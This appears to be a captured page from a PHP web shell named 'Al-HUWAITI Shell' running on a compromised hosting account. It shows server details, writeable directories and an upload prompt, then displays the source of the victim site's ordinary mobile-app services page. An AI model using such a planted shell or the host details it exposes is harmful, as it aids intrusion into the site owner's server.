Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux us-phx-web1202.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User : u615232177 ( 615232177)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/u615232177/domains/thommytonservices.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u615232177/domains/thommytonservices.com/public_html/mobile_apps.php
<?php session_start();
$page_name = basename($_SERVER['PHP_SELF']); 
include("header.php"); ?>
<title><?php echo $company_name; ?> - Mobile App Development</title>
<?php 
	//generate a random number
	$random_picture=(rand(1,3)); 
?>
<section class="hero-wrap hero-wrap-2" style="background-image: url('images/<?php echo $random_picture; ?>.jpg');" data-stellar-background-ratio="0.5">
	<div class="overlay"></div>
	<div class="container">
		<div class="row no-gutters slider-text align-items-end justify-content-center">
			<div class="col-md-9 ftco-animate pb-5 text-center">
				<h1 class="mb-3 bread">Mobile App Development</h1>
				<p class="breadcrumbs">
					<span class="mr-2">
						<a href="index.php">
							Home 
							<i class="ion-ios-arrow-forward"></i>
						</a>
					</span> 
					<span class="mr-2">
						<a href="mobile_apps.php">Mobile App Development 
							
						</a>
					</span> 
					<span></span>
				</p>
			</div>
		</div>
	</div>
</section>

<section class="ftco-sectin bg-light ftco-animate" id="blog-section"><br><br>
<div class="container">

<div class="row d-flex">

<div class="col-md-12 col-lg-12 ftco-animate">
<h2>MOBILE APPLICATION DEVELOPMENT SERVICES FOR VARIOUS PLATFORMS</h2>
<b>Our mobile app developers have over a decade-long expertise in building solutions that meet market needs, empower companies’ brand identity, and encourage business growth and expansion.</b>
<br><br>
<img src='images/tk.png'style='width:30px;height:30px;'> Custom iOS and Android apps development<br>
<img src='images/tk.png'style='width:30px;height:30px;'>Native and cross-platform solutions<br>
<img src='images/tk.png'style='width:30px;height:30px;'>Second platform app development<br>
<img src='images/tk.png'style='width:30px;height:30px;'>Automated QA and testing<br>
<img src='images/tk.png'style='width:30px;height:30px;'>UI/UX design<br>
<img src='images/tk.png'style='width:30px;height:30px;'>Power management, notification and geofencing<br>
<img src='images/tk.png'style='width:30px;height:30px;'>Embedded Android & AOSP customizations<br>
<img src='images/tk.png'style='width:30px;height:30px;'>Maintenance and post-warranty support <br>
<img src='images/tk.png'style='width:30px;height:30px;'>Consulting and prototyping<br><br>

<img src='images/ma1.jpg' style='width:100%;border-radius:5px;'><br/><br/>

<h3>Native Mobile App Development</h3>
Our mobile app developers can build high-quality native apps for both Android and iOS systems aligned with your business and security requirements.
<br><br>
 <h3>Hybrid Mobile App Development</h3>
Cross-platform apps that can work in different environments thanks to a unique blend of native and web app technologies.
<br><br>
<h3>Progressive Web App Development</h3>
With Progressive Web Apps, we deliver native-like capabilities and installability while reaching anyone, anywhere, on any device with a single codebase.
<br><br>
<h3>Wearables and Embedded Software</h3>
We can create companion apps for a number of wearable devices, integrate with smart devices or proprietary peripherals.
<br/><br>
Delight your users with expressive and feature-rich native iOS / Android, cross-platform or Progressive Web Apps leveraging our extensive experience of working with all major technologies. We always keeps track of emerging technologies to deliver forward-thinking solutions. From the highest level of security with blockchain to reliable automation with AI/ML — use every benefit for your solution. <br><br>
</div>
</div>
</div>
</section>
<section class="ftco-sectio bg-light" id="">
<div class="container ftco-animate">
<div class="row justify-content-center mb-5 pb-5" style='background:<?php echo $theme_color; ?>;border-radius:5px;'>
<div class="col-md-7 heading-section text-center ftco-animate"><br>
<span class="subheading"><?php echo $company_name; ?></span>
<h2 class="mb-4" style='color:white;'>Do you need a higly functional mobile app?</h2>
<p>Building an app for your business enables you to form a tight connection between you and your customers as you are able to give them an enhanced experience which is difficult to replicate otherwise. Call us today for a quote.</p>

<p class="mb-0"><a href="contact.php" class="btn btn-opp">Contact us <span class="ion-ios-arrow-round-forward"></span></a></p>
</div>
</div>

</div>
</section>
<?php include("footer.php"); ?>

Al-HUWAITI Shell